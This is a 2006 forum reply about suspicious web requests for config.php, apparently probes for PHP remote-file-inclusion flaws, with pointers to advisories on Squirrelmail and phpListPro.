Posted by Colin McKinnon on 08/30/06 19:45

Ignoramus6539 wrote:

> There were some strange requests to my server asking for config.php
> file (which I do not have in the requested location).
>

Nice one Ignoramus6539

> I did some investigation. Seems to be a virus written in perl,
> exploiting a vulnerability in php code.
>

Sure looks like it. Is anyone daft enough to include($get_parameter)?

> I did a locate command on my fedora systems and found config.php in
> some package called 'squirrelmail'. Which I immediately deleted, even
> though it was not accessible through the web, just sitting there, but
> I just do not want it.
>
Oooh. "Some package called...' sloppy housekeeping!

Actually, although Squirrelmail was vulnerable to this kind of attack
(http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
the developers are relatively good about releasing fixes.

Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).

Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.

> My main question is, just what package or program owns config.php that
> si vulnerable. It is a generic file name, so I would not be so quick
> to suspect squirrelmail.
>
Next time try Google first :) and give us a URL for the code.

C.

[Back to original message]